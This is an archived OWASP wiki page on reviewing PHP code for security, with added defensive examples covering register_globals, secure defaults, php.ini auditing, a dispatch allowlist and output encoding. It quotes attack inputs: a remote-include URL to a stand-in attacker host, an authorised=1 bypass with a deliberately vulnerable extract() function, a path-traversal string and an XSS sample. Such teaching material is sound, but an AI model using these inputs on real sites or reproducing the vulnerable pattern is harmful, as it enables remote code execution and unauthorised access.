This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "PHP Security Leading Practice"
Revision as of 10:47, 24 October 2007
Global Variables
One does not need to explicitly create "global variables": with the php.ini directive register_globals set to On, PHP turns every request parameter (GET, POST and cookie values) into a PHP variable of the same name before the script runs. register_globals has been Off by default since PHP 4.2.0, was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, but code written to rely on it, and code that recreates the behaviour with extract($_REQUEST) or similar, still has the problems described below.
Include directives in PHP can be vulnerable if register_globals is enabled:
<?php include "$dir/script/dostuff.php"; ?>
With register_globals enabled the $dir variable can be supplied by the client via the query string:
?dir=http://www.haxor.com/gimmeeverything.php
which makes the include statement equivalent to:
<?php include "http://www.haxor.com/gimmeeverything.php"; ?>
and the attacker's script is fetched and executed on the server. Including a remote URL requires allow_url_fopen to be On (its default) and, since PHP 5.2.0, allow_url_include to be On as well (Off by default); even where remote includes are blocked, the same parameter still lets the client choose which local directory the file is loaded from.
Appending global variables to the URL may be a way to circumvent authentication:
<?php if(authenticated_user()) { $authorised=true; } if($authorised) { give_family_jewels(); } ?>
If this page is requested with register_globals enabled and ?authorised=1 in the query string, $authorised already holds the string "1" (which PHP treats as true) before the first line runs, so the check passes and the code assumes the user is authorised to proceed even when authenticated_user() returned false. Without register_globals enabled the variable $authorised is not affected by the authorised=1 parameter: it is simply undefined, which evaluates as false.
Initialization
When reviewing PHP code, make sure every security-relevant variable is explicitly initialised to a "secure default" before it is used, so that its value never depends on whether something else set it first. For example, $authorised = false; at the top of the script would have closed the bypass above even with register_globals on, because the assignment runs after PHP has imported the request variables and overwrites whatever the client supplied.
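The bypass from the Global Variables section and the secure default from this one, side by side, as an added example that is not code from the OWASP page. extract() is used to stand in for register_globals (which modern PHP no longer has), and authenticated_user() is a stand-in that always returns false, so any "allowed" result can only have come from the request parameter.

```php
<?php
// Added example (not code from the OWASP page): the $authorised bypass from
// the Global Variables section, with extract() standing in for
// register_globals, next to the secure-default version from Initialization.
declare(strict_types=1);

// Stand-in for the page's authenticated_user(); it returns false so that
// any "allowed" result below can only have come from the request.
function authenticated_user(): bool
{
    return false;
}

// register_globals style: request parameters become local variables before
// the check runs, and the code never initialises $authorised itself.
function access_with_register_globals(array $query): bool
{
    extract($query);                  // what register_globals=On did for every request
    if (authenticated_user()) {
        $authorised = true;
    }
    // ?authorised=1 arrives as the string "1", which !empty() treats as true.
    return !empty($authorised);
}

// Secure default: $authorised is assigned false before any check, and no
// request data is imported into the local scope at all ($query is ignored).
function access_with_secure_default(array $query): bool
{
    $authorised = false;              // secure default, set before the check
    if (authenticated_user()) {
        $authorised = true;
    }
    return $authorised;
}

// Constructed request: the attacker appends ?authorised=1 to the URL.
$forged = ['authorised' => '1'];

var_dump(access_with_register_globals($forged));
var_dump(access_with_secure_default($forged));
```

With the forged request the first function grants access although authenticated_user() never returned true; the second denies it, because the assignment of false happens after any import of request data and nothing else in the function can flip it.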
Error handling
Check how error reporting is configured in php.ini: in production, display_errors should be Off so that error messages (which routinely contain file paths, SQL fragments and variable contents) are not sent to the client, and log_errors should be On so that the same messages still reach the server log. Note that error_reporting controls which errors PHP raises at all; switching it off hides problems from the log as well and is not a substitute for display_errors = Off.
File Manipulation
allow_url_fopen is enabled by default in php.ini. It allows URLs to be treated like local files by fopen(), file_get_contents(), include and similar functions, so a URL pointing at an attacker-controlled script can be included and executed as if it were a local file. Since PHP 5.2.0 include and require of a URL additionally require allow_url_include, which is Off by default. When reviewing, check both directives, and check that no user-controlled value reaches the path argument of include, require, fopen or file_get_contents.
HTTP request Handling
The dispatch method uses one script as a "funnel" through which all requests pass: one does not access other PHP files directly but only via dispatch.php, which loads the requested module. This is akin to a global input validation class through which all traffic passes.
http://www.example.com/dispatch.php?fid=dostuff
Relating to security, it is leading practice to implement validation at the top of this file, before anything else is included, and to map fid onto a fixed list of local module files rather than building an include path from it. All other modules can then be loaded with include or require from a different directory, ideally one outside the web root so that they cannot be requested directly and so bypass the dispatcher.
Including a method: If a dispatch.php pattern is not being used, look for includes at the top of each PHP file. An included file may set state (for example an $authorised flag or a session check) on which the rest of the request depends, so both its contents and whether any script can be reached without it need to be reviewed.
It is also worth checking php.ini for the auto_prepend_file directive (and its counterpart auto_append_file). It names a file that is automatically included before every script, which may be where global validation actually lives, and which is also a place an attacker with write access to php.ini or .htaccess can hook every request.
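A dispatch.php written this way, as an added example that is not code from the OWASP page. The module names and the modules/ directory are assumptions for the example; the point is that fid is validated at the top of the file and is only ever used as a key into an allowlist, never as part of a path.

```php
<?php
// Added example (not code from the OWASP page): a dispatch.php front
// controller that validates ?fid= before anything is included and only
// loads modules from a fixed allowlist. Module names and the modules/
// directory are assumptions made for the example.
declare(strict_types=1);

// Allowlist: the only values of fid that map to code. Paths, "..", and
// URLs never match a key, so they are rejected before include is reached.
const MODULES = [
    'dostuff' => 'dostuff.php',
    'profile' => 'profile.php',
    'logout'  => 'logout.php',
];

function resolve_module(string $fid, string $base_dir): ?string
{
    // Explicit lookup; the request value is never interpolated into a path.
    if (!array_key_exists($fid, MODULES)) {
        return null;
    }
    $root = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . MODULES[$fid]);
    // Defence in depth: the resolved file must still be inside modules/.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Validation at the top of dispatch.php, before any include.
$fid = $_GET['fid'] ?? '';
// ?fid[]=x would make $fid an array; reject that before preg_match sees it.
if (!is_string($fid) || !preg_match('/^[a-z0-9_]{1,32}$/', $fid)) {
    http_response_code(400);
    exit('invalid fid');
}

$module = resolve_module($fid, __DIR__ . '/modules');
if ($module === null) {
    http_response_code(404);
    exit('unknown module');
}

require $module;   // a local file chosen by the allowlist, never by the request
```

Because fid is only ever a key, a request such as ?fid=http://www.haxor.com/gimmeeverything.php or ?fid=../../etc/passwd fails the pattern check and the lookup long before include runs, regardless of the allow_url_fopen or allow_url_include settings.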
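A small audit of the php.ini directives named in the Error handling, File Manipulation and HTTP request Handling sections, as an added example that is not code from the OWASP page. The expected values are a reviewer's production baseline, not PHP's defaults, and the script must be run under the same SAPI as the application (php-fpm or mod_php), because the CLI may load a different php.ini.

```php
<?php
// Added example (not code from the OWASP page): an audit of the php.ini
// directives this page tells a reviewer to check. Expected values are a
// production baseline chosen for the example, not PHP defaults. Run it
// under the application's own SAPI; the CLI may read a different php.ini.
declare(strict_types=1);

function audit_php_ini(): array
{
    // directive => [expected value, why a reviewer cares]
    $baseline = [
        'register_globals'  => ['0', 'request parameters become PHP variables'],
        'allow_url_fopen'   => ['0', 'URLs are treated like local files by fopen() and friends'],
        'allow_url_include' => ['0', 'URLs are accepted by include/require (PHP >= 5.2)'],
        'display_errors'    => ['0', 'error text, paths and values are shown to the client'],
        'log_errors'        => ['1', 'errors should go to the server log instead'],
        'auto_prepend_file' => ['',  'a file is silently included before every script'],
    ];

    $findings = [];
    foreach ($baseline as $name => [$expected, $why]) {
        $actual = ini_get($name);
        if ($actual === false) {
            // ini_get() returns false for directives this PHP build does not
            // know, e.g. register_globals on PHP >= 5.4 where it was removed.
            $findings[$name] = 'not present in this PHP version (nothing to check)';
            continue;
        }
        if ($name === 'auto_prepend_file') {
            $ok = ($actual === '');
        } else {
            // php.ini accepts On/Off, yes/no, true/false and 1/0; normalise
            // before comparing. Anything else (e.g. display_errors=stderr)
            // comes back as null and is flagged for a manual look.
            $bool = filter_var($actual, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
            $ok = ($bool !== null) && ($bool === ($expected === '1'));
        }
        if (!$ok) {
            $findings[$name] = sprintf('is "%s", expected "%s": %s', $actual, $expected, $why);
        }
    }
    return $findings;
}

$findings = audit_php_ini();
if ($findings === []) {
    echo 'no findings', PHP_EOL;
}
foreach ($findings as $directive => $message) {
    echo $directive, ': ', $message, PHP_EOL;
}
```

ini_get() reports the effective value, so it also picks up settings applied through .htaccess, php-fpm pool configuration or ini_set() in an auto-prepended file, which a read of php.ini alone would miss.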
Good Things to Use
strip_tags(): Removes HTML and PHP tags from a string. It is a convenience for discarding markup, not an XSS defence: it does not encode what remains, and when an allowed-tags argument is given, attributes on the allowed tags (including event handlers such as onmouseover) are left in place.
nl2br(): Converts new line characters to HTML line breaks ("<br />"). Apply it to text that has already been encoded; it is not a sanitiser.
htmlspecialchars(): Converts &, <, >, " and (with ENT_QUOTES) ' to HTML entities. This is the function to use for output encoding of untrusted data placed into HTML content.
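How the three functions above behave on a hostile comment, and the order in which to apply them, as an added example that is not code from the OWASP page. The comment text is constructed for the example.

```php
<?php
// Added example (not code from the OWASP page): the three "good things"
// applied to a constructed hostile comment.
declare(strict_types=1);

// Correct order for rendering multi-line user text in HTML: encode first,
// then turn newlines into <br />. Encoding after nl2br() would also encode
// the <br /> it inserted.
function render_comment(string $untrusted): string
{
    return nl2br(htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8'));
}

// strip_tags() with an allowlist keeps the allowed tag together with its
// attributes, so an event handler on it survives, and the text inside a
// removed <script> element is kept as plain text. Shown to illustrate why
// it is not an output-encoding substitute.
function strip_only(string $untrusted): string
{
    return strip_tags($untrusted, '<b>');
}

// Constructed input: an allowed tag carrying an event handler, a script
// element, and characters that must be encoded in HTML.
$comment = "Hi <b onmouseover=\"alert(1)\">there</b>\n<script>steal()</script> & \"bye\"";

echo render_comment($comment), PHP_EOL;
echo strip_only($comment), PHP_EOL;
```

render_comment() returns markup in which every angle bracket, ampersand and quote from the input is an entity and the only real tag is the <br /> inserted by nl2br(); strip_only() returns the <b> tag with its onmouseover attribute intact, which is exactly the case the strip_tags() caveat above warns about.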